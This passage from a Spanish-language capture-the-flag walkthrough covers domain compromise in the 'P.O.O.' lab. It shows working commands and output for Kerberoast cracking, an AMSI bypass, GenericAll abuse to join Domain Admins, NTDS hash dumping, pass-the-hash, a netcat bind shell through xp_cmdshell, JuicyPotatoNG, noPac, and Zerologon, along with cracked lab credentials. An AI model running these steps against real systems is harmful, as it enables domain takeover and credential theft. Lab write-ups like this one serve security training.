cyber_audit/intranet.poo:443     p00_adm  CN=P00 Help Desk,CN=Users,DC=intranet,DC=poo  2018-05-10 22:26:14.087657  2023-08-20 19:24:12.359050             

$krb5tgs$23$*p00_hr$INTRANET.POO$intranet.poo/p00_hr*$eadd6551ee9ab527fc107a398ff38131$cde7fbcdbc22392c27c0d7099ed7101a7fef29d8afd81f9610b169db351f354263be182a4f00a74a0133378c96163574a354fdad1e2659829bb994100e36343e0325021c7aca8b66a186c40bd8df955bfce34e26c9b4fa2fd418a436a2c1cbb72a453fcb0b016b10a93e11e39df21614073d3312351e2c15fe6666cf9694b6746bfc677465ccfd00588304ede12f61a2ca2042b3c8a003b76a1bce9791aeda8e8448a1c90bb861ab063356c157c2ae279a02100fc41af2bfbdb61d6b9e2b675e98022738cd989ac3d331417447e15b8a724762f6556c365d89ab1e1ba82e06157a4cb81f9d091bd517405ad6de03e256f55efb17d3799abc295a8b4788da60ad1afb6e1140a25086a857dd368fcfc62c497a40b86a9d95938a66897e12906921484f61c82b5b3e350c9d194798a5007dd8ba43ca9cf5a605be3a38dfd035ab3451ddb8e7849ea856eb8f6e45a0e93cb1ebb750384be77b70b2da024d6a09c77b914bf841a712418db3590d243519eeafc74b7db10a42e45b55fe809b7e689bc4962833194705c9a35d8825dde580f737650be47687bcc0cf80e9710cd4b28f833d9e45bb2a11a8f561ecf32f629761d880b2d2b579fce2adbad4208dbf743279fc470d266d7c0e58a87ef015d6de08ead986c111d63b5d98b97d21f6aa654e38367a9029aa6d7c1e1485ad5a7d36742fa3fa3ee30959e6a0a3135f5f8ecda65c69eacc336c8fff8aeedf854af32ede374b5b14aeb21a1569be9910fb856fe2a237ecb0efbd05d60d76825613974e7055afe9e99bfa1db1e10b245a6d53953c8812adc4c368d3357edef71b3d8faa165b61b83009ac3874604bba1a6ead6670a44934c366c1674adc5706f07b3495a097d9eef25e49dbef964822af2baeba089c2e26de2a10e7cab825a45e8adbd7f3b9790c2e4bdc3969144a4d0fd68a7a9b33a825d7447db5e073aa2597e13eb0bb1b637812618b49e1b28d26fcd0491cd71f48bf49147e8dec8cdcc862e81a87b27fe5dadeb52f54e09146247b760c7fec59e393bacb56033fcb7f7efc59446e5b7d7bad9e8103aa98717a2341defb7ed007be4929f90fb9aee7a517becf00f3e1b85440e782b5dd309750162585ec2c0afe077dd8d7e72ada8cf2a71b92826b052d7ab38fb0fbdb8dbcaf0b9c072ff30220c6d2ac9d686fd56c5a724644d642ff276cdfa23abf2982f288d21350b99624a3466542e917363d9eb90cfaee2c10fa5f228efe0342078ad30940064e65e7051d9a22317c
$krb5tgs$23$*p00_adm$INTRANET.POO$intranet.poo/p00_adm*$f7e544b9c50d78edf42f813373a5ee39$362c95159b6849634f38d56f5cda8119079ff639e4c36d53de966353fc865f802956866f059f766a7f0797f290f137dc6a69e6d78e5a8f02f706ea1362b7b9c42309ccc0a337c3a22e2de110d65c215b6793c360fb1df8fc3df86055ce61c8b3b44833713411bb67fa05befe2745d27a1be3e688ee930dceb6d90b5d866ff2b87686cd0e64ad286ea244c818b6b96c2af791fe557f0ff91a05e9e6a805238660720d0f07e4bc1e838d2dce3c16b094d205118c2790ea0888605abd56a2919194bce513d6b3e894bb3baed46a766e4a9afed915fa4d0bea5649b8515bcc81c538e98634eaa2cdab49f72612f228b7c2addfaad09f43131cd92b4dd121cc7236bad0137bb3a88dc3ae848c2f2f5fe861e5e3869046012c3791dc798e23638d0650ef7e9ecd051ce830a919649ce5d8deb17f88d623548ca774559b7206710da2ddde0f36e4365054a2dbf5a120d86232084f45eb53d6d8cde91aab5b3d18c3f79c8774024259ff80110dab34651ad9c5fdbcf8b0ceab3826cf6baf5f0fcf7c6d783cfe6d4f67ad0e37c7360bfbaf2a42e13f1342e2883121f609571007b17bdad709e4a2ebaa2f8c926aaf66cf0e2b7b05a1c114729847b5c1133cb4a8997fc5c3adfbbf75ddf22ef2ae5cdf43b78866cb3f5d44e5c5100286db52659916371eeb6bae756b112406d5a06ed7c5df5fda977df4c7cb1aefaf12a0f37d5556481750a7a343e765e12b39d7ef71093c96fa870c1c2c7a2626c5e589adae1f1e36a080a5d522ecafad883fad0a893ebb5512ea456cdd77e6b0162ff40e659cba174f70e8c161204d688314849d6d4ea62eb2234aa1824e9a442d2dcce49dd7e0cf83154a87fe14f063d2e85fd3afbb25392ff7f41508b1dbefa5ba7746059a90484f321beb304769feb314440495176f405409c0dc0f7ff3bb4e08adde217bdfc281d6558f4bc046c4440d358215fd27f0f8c6b9bca423ac668bdebfc8ecb070fb7aa58d16834882a8c46ddd482f05309f155930655fc4ffc8a0f858ec3547fed91543a0fc7322bfc6cdd77cb2f2a3e247a0141013067dbe18a70ae503b3b786bb9ee8da952dfd01e50f1ef8cd9e2dc9e108e9116a46999ebc18ac32b734e5836207004ab19108d96daebe08d7be905fcb441967bb64e531dcbd05f49ee5dc8639298b0baf63a680b0ddb47bb76d21058a615e40d6000287765e214d4c7d9cd06acbd731430d44dc3c8c15950f3870eca20593c60122327e688f3bb2fae48a37171975b21ebd31

Nuevamente el diccionario rockyou no nos servira pero si utilizamos el diccionario de antes conseguimos la contraseña del usuario p00_adm en texto plano

❯ john -w:/usr/share/seclists/Passwords/Keyboard-Combinations.txt hashes
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])  
Press 'q' or Ctrl-C to abort, almost any other key for status
ZQ!5t4r          (?)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Volvemos a bloodhound y buscando caminos cortos para ser Domain Admins encontramos que el grupo P00 HELP DESK al cual pertenece el usuario p00_adm tiene el privilegio GenericAll sobre el grupo Domain Admins que queremos

Para la explotación podemos dar clic derecho en GenericAll y Help, en la pestaña Abuse Info encontramos información de en que consiste y como explotarlo

Iniciamos por subir el PowerView.ps1 con upload e importarlo, sin embargo al hacerlo nos dice que ha sido bloqueado por el antivirus por contenido malicioso

PS C:\Users\Administrator\Documents> upload PowerView.ps1

Info: Uploading PowerView.ps1 to C:\Users\Administrator\Documents\PowerView.ps1

Data: 1027036 bytes of 1027036 bytes copied

Info: Upload successful!

PS C:\Users\Administrator\Documents> Import-Module .\PowerView.ps1
At C:\Users\Administrator\Documents\PowerView.ps1:1 char:1
+ #requires -version 2
+ ~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.  
At C:\Users\Administrator\Documents\PowerView.ps1:1 char:1
+ #requires -version 2
+ ~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent
PS C:\Users\Administrator\Documents>

Podemos usar la función Bypass-4MSI incluida en evil-winrm y ahora al importar el modulo lo hace sin problemas y no tenemos problemas con el antivirus

PS C:\Users\Administrator\Documents> Bypass-4MSI

Info: Patching 4MSI, please be patient...

[+] Success!

PS C:\Users\Administrator\Documents> Import-Module .\PowerView.ps1  
PS C:\Users\Administrator\Documents>

Siguiendo las instrucciones en bloodhound iniciamos definiendo las credenciales del usuario p00_adm que hemos conseguido a traves del kerberoasting attack

PS C:\Users\Administrator\Documents> $SecPassword = ConvertTo-SecureString 'ZQ!5t4r' -AsPlainText -Force
PS C:\Users\Administrator\Documents> $Cred = New-Object System.Management.Automation.PSCredential('intranet.poo\p00_adm', $SecPassword)  
PS C:\Users\Administrator\Documents>

Ahora añadimos al usuario p00_adm a Domain Admins aprovechando el privilegio

PS C:\Users\Administrator\Documents> Add-DomainGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $Cred  
PS C:\Users\Administrator\Documents>

Con la credencial de p00_adm que tenemos definida deberiamos de poder invocar un comando indicando como objetivo el DC, este se ejecuta como p00_adm

PS C:\Users\Administrator\Documents> Invoke-Command -ComputerName dc -Credential $Cred -Command { whoami }  
poo\p00_adm
PS C:\Users\Administrator\Documents>

Ahora simplente buscamos de manera recursiva la flag que esta en el escritorio del usuario mr3ks y la leemos, aunque aun no conseguimos una shell interactiva

PS C:\Users\Administrator\Documents> Invoke-Command -ComputerName dc -Credential $Cred -Command { dir C:\Users -recurse flag.txt }

    Directory: C:\Users\mr3ks\Desktop

Mode                LastWriteTime         Length Name              PSComputerName
----                -------------         ------ ----              --------------
-a----       26/03/2018     17:47             37 flag.txt          dc

PS C:\Users\Administrator\Documents> Invoke-Command -ComputerName dc -Credential $Cred -Command { type C:\Users\mr3ks\Desktop\flag.txt }  
POO{1196ef8bc523f084ad1732a38a0851d6}
PS C:\Users\Administrator\Documents>

Con crackmapexec podemos comprobar que las credenciales de p00_adm son validas y como somos Domain Admins también dumpeamos los hashes del ntds

❯ proxychains -q crackmapexec smb intranet.poo -u p00_adm -p 'ZQ!5t4r'
SMB         intranet.poo    445    DC               [*] Windows Server 2016 Standard 14393 x64 (name:DC) (domain:intranet.poo) (signing:True) (SMBv1:True)  
SMB         intranet.poo    445    DC               [+] intranet.poo\p00_adm:ZQ!5t4r (Pwn3d!)

❯ proxychains -q crackmapexec smb intranet.poo -u p00_adm -p 'ZQ!5t4r' --ntds drsuapi
SMB         intranet.poo    445    DC               [*] Windows Server 2016 Standard 14393 x64 (name:DC) (domain:intranet.poo) (signing:True) (SMBv1:True)
SMB         intranet.poo    445    DC               [+] intranet.poo\p00_adm:ZQ!5t4r (Pwn3d!)
SMB         intranet.poo    445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         intranet.poo    445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:4f53a926429fd0e53776ab738b1bccc4:::
SMB         intranet.poo    445    DC               Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         intranet.poo    445    DC               krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f2d5bbdb13be8f3861588493350df289:::
SMB         intranet.poo    445    DC               DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         intranet.poo    445    DC               mr3ks:1000:aad3b435b51404eeaad3b435b51404ee:1f989b7c5df25598ad816e342f69e090:::
SMB         intranet.poo    445    DC               p00_hr:1105:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
SMB         intranet.poo    445    DC               p00_dev:1106:aad3b435b51404eeaad3b435b51404ee:89e178b8eabf074173edb164fb385ad4:::
SMB         intranet.poo    445    DC               p00_adm:1107:aad3b435b51404eeaad3b435b51404ee:a28543372c65db507ce6c266e192594e:::
SMB         intranet.poo    445    DC               DC$:1001:aad3b435b51404eeaad3b435b51404ee:561b89eaff4f6c4c7a6ebf8ed7e7385e:::
SMB         intranet.poo    445    DC               COMPATIBILITY$:1104:aad3b435b51404eeaad3b435b51404ee:bb426464bbe7a8ad0d158c587dcfaf64:::

Algo importante a tener en cuenta es que aunque tenemos el hash NT del usuario Administrator la cuenta de este usuario esta deshabilitada en el dominio 

❯ proxychains -q crackmapexec smb intranet.poo -u Administrator -H 4f53a926429fd0e53776ab738b1bccc4
SMB         intranet.poo    445    DC               [*] Windows Server 2016 Standard 14393 x64 (name:DC) (domain:intranet.poo) (signing:True) (SMBv1:True)  
SMB         intranet.poo    445    DC               [-] intranet.poo\Administrator:4f53a926429fd0e53776ab738b1bccc4 STATUS_ACCOUNT_DISABLED

Ahora como el usuario mr3ks o como cualquier usuario administrador del dominio como p00_adm nos podemos conectar por winrm al DC haciendo un passthehash

❯ proxychains -q evil-winrm -i intranet.poo -u mr3ks -H 1f989b7c5df25598ad816e342f69e090  
PS C:\Users\mr3ks\Documents> whoami
poo\mr3ks
PS C:\Users\mr3ks\Documents> hostname
DC
PS C:\Users\mr3ks\Documents> type ..\Desktop\flag.txt
POO{1196ef8bc523f084ad1732a38a0851d6}
PS C:\Users\mr3ks\Documents>

O también podemos hacer uso de psexec con las credenciales para obtener una shell en el DC como nt authority\system que es el usuario con maximos privilegios

❯ proxychains -q impacket-psexec intranet.poo/p00_adm:'ZQ!5t4r'@intranet.poo  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on intranet.poo.....
[*] Found writable share ADMIN$
[*] Uploading file WudsKinB.exe
[*] Opening SVCManager on intranet.poo.....
[*] Creating service zzeo on intranet.poo.....
[*] Starting service zzeo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
DC

C:\Windows\system32> type C:\Users\mr3ks\Desktop\flag.txt
POO{1196ef8bc523f084ad1732a38a0851d6}

C:\Windows\system32>


Extra 1

SeImpersonatePrivilege - Compatibility Administrator


Como alternativa en mssql podemos usar un proyecto que nos permite crear un proxy a través de la conexion mssql, para ello usaremos la version modificada de mssqlclient.py iniciamos ejecutando enable_ole y subiendo el reciclador.dll

❯ python2 mssqlclient.py intranet.poo/pwned:password123#@10.13.38.11
Impacket v0.11.0 - Copyright 2023 SecureAuth Corporation

mssqlproxy - Copyright 2020 BlackArrow
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.  
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235) 
[!] Press help for extra shell commands
SQL> enable_ole
SQL> upload reciclador.dll C:\ProgramData\reciclador.dll
[+] Uploading 'reciclador.dll' to 'C:\ProgramData\reciclador.dll'...
[+] Size is 111616 bytes
[+] Upload completed
SQL>

Ahora procederemos a instalar el archivo assembly.dll, esto usando los parametros -install y -clr para indicarlo, estos parametros son parte del proyecto modificado

❯ python2 mssqlclient.py intranet.poo/pwned:password123#@10.13.38.11 -install -clr assembly.dll  
Impacket v0.11.0 - Copyright 2023 SecureAuth Corporation

mssqlproxy - Copyright 2020 BlackArrow
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235) 
[*] Proxy mode: install
[*] CLR enabled
[*] Assembly successfully installed
[*] Procedure successfully installed

Finalmente inciamos el reciclador indicando la ruta del dll, al correrlo este nos abre un proxy el puerto 1337 que podemos indicar en la configuracion de proxychains

❯ python2 mssqlclient.py intranet.poo/pwned:password123#@10.13.38.11 -start -reciclador 'C:\ProgramData\reciclador.dll'  
Impacket v0.11.0 - Copyright 2023 SecureAuth Corporation

mssqlproxy - Copyright 2020 BlackArrow
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235) 
[*] Proxy mode: check
[*] Assembly is installed
[*] Procedure is installed
[*] reciclador is installed
[*] clr enabled
[*] Proxy mode: start
[*] Listening on port 1337...
[*] ACK from server!

Ya que no tenemos conexion podemos aprovechar esta version de mssqlclient modificada usando su función upload para subir netcat.exe y asi ganar una shell

SQL> upload netcat.exe C:\ProgramData\netcat.exe
[+] Uploading 'netcat.exe' to 'C:\ProgramData\netcat.exe'...  
[+] Size is 43696 bytes
[+] Upload completed
SQL>

Ahora con xp_cmdshell ejecutamos el netcat.exe para que inicie un listener en el puerto 4444 y cuando reciba una conexion devuelva una powershell interactiva

SQL> xp_cmdshell C:\ProgramData\netcat.exe -e powershell -lvnp 4444

Finalmente aprovechando el proxy que creamos antes podemos conectarnos a la maquina y obtener una powershell interactiva como la cuenta de servicio

❯ proxychains -q netcat compatibility.intranet.poo 4444
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.  

PS C:\Windows\System32> whoami
nt service\mssql$poo_public
PS C:\Windows\System32>

La shell de mssql como cuenta de servicio tiene habilitado SeImpersonatePrivilege el cual nos sirve para suplantar a cualquier usuario incluido nt authority\system

PS C:\Windows\System32> whoami
nt service\mssql$poo_public
PS C:\Windows\System32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========  
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

PS C:\Windows\System32>

Y aunque realmente no nos aporta nada ya que somos Administrator podemos usar JuicyPotatoNG para ejecutar netcat.exe para dejar un listener en el puerto 4444

PS C:\ProgramData> .\JuicyPotatoNG.exe -t * -p C:\ProgramData\netcat.exe -a '-e powershell -lvnp 4444'  

         JuicyPotatoNG
         by decoder_it & splinter_code

[*] Testing CLSID {854A20FB-2D44-457D-992F-EF13785D2B51} - COM server port 10247
[+] authresult success {854A20FB-2D44-457D-992F-EF13785D2B51};NT AUTHORITY\SYSTEM;Impersonation
[+] CreateProcessAsUser OK
[+] Exploit successful!

PS C:\ProgramData>

Al conectarnos al puerto esta vez nos da una powershell como nt authority\system

❯ proxychains -q netcat compatibility.intranet.poo 4444
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.  

PS C:\> whoami
nt authority\system
PS C:\> hostname
COMPATIBILITY
PS C:\>


Extra 2

CVE-2021-42278 / CVE-2021-42287 - DC Administrator


Como alternativa podemos usar noPac, al explotarlo indicando el parametro -shell nos otorgara una cmd como el usuario nt authority\system directamente en el DC, sin embargo es importante indicar un usuario admin que no sea Administrator ya que esta deshabilitado, podemos indicar simplemente suplantar a mr3ks

❯ proxychains -q python3 noPac.py intranet.poo/p00_dev:Development1! -use-ldap -shell -dc-ip 172.20.128.53 --impersonate mr3ks  

███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target dc.intranet.poo
[*] will try to impersonate mr3ks
[*] Adding Computer Account "WIN-VKPDAND9FI1$"
[*] MachineAccount "WIN-VKPDAND9FI1$" password = nKCK**5iG*PI
[*] Successfully added machine account WIN-VKPDAND9FI1$ with password nKCK**5iG*PI.
[*] WIN-VKPDAND9FI1$ object = CN=WIN-VKPDAND9FI1,CN=Computers,DC=intranet,DC=poo
[*] WIN-VKPDAND9FI1$ sAMAccountName == dc
[*] Saving a DC's ticket in dc.ccache
[*] Reseting the machine account to WIN-VKPDAND9FI1$
[*] Restored WIN-VKPDAND9FI1$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating mr3ks
[*] 	Requesting S4U2self
[*] Saving a user's ticket in mr3ks.ccache
[*] Rename ccache to mr3ks_dc.intranet.poo.ccache
[*] Attempting to del a computer with the name: WIN-VKPDAND9FI1$
[-] Delete computer WIN-VKPDAND9FI1$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>


Extra 3

CVE-2020-1472 - DC Administrator


Como alternativa podemos ejecutar la vuln de zerologon hacia el DC, el servidor es vulnerable y logramos cambiar la contraseña del equipo por una cadena vacia

❯ proxychains -q python3 cve-2020-1472-exploit.py DC 172.20.128.53
Performing authentication attempts...
==========================================================================  
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

Autenticandonos como el equipo DC$ con una cadena vacia como contraseña podemos hacer un DCSync y ver los hashes NT de todos los usuarios del dominio

❯ proxychains -q crackmapexec smb intranet.poo -u DC$ -p '' --ntds drsuapi
SMB         intranet.poo    445    DC               [*] Windows Server 2016 Standard 14393 x64 (name:DC) (domain:intranet.poo) (signing:True) (SMBv1:True)  
SMB         intranet.poo    445    DC               [+] intranet.poo\DC$: 
SMB         intranet.poo    445    DC               [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         intranet.poo    445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         intranet.poo    445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:4f53a926429fd0e53776ab738b1bccc4:::
SMB         intranet.poo    445    DC               Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         intranet.poo    445    DC               krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f2d5bbdb13be8f3861588493350df289:::
SMB         intranet.poo    445    DC               DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         intranet.poo    445    DC               mr3ks:1000:aad3b435b51404eeaad3b435b51404ee:1f989b7c5df25598ad816e342f69e090:::
SMB         intranet.poo    445    DC               p00_hr:1105:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
SMB         intranet.poo    445    DC               p00_dev:1106:aad3b435b51404eeaad3b435b51404ee:89e178b8eabf074173edb164fb385ad4:::
SMB         intranet.poo    445    DC               p00_adm:1107:aad3b435b51404eeaad3b435b51404ee:a28543372c65db507ce6c266e192594e:::
SMB         intranet.poo    445    DC               DC$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         intranet.poo    445    DC               COMPATIBILITY$:1104:aad3b435b51404eeaad3b435b51404ee:bb426464bbe7a8ad0d158c587dcfaf64:::

Ahora como el usuario mr3ks o como cualquier usuario administrador del dominio como p00_adm nos podemos conectar por winrm al DC haciendo un passthehash

❯ proxychains -q evil-winrm -i intranet.poo -u mr3ks -H 1f989b7c5df25598ad816e342f69e090  
PS C:\Users\mr3ks\Documents> whoami
poo\mr3ks
PS C:\Users\mr3ks\Documents> hostname
DC
PS C:\Users\mr3ks\Documents>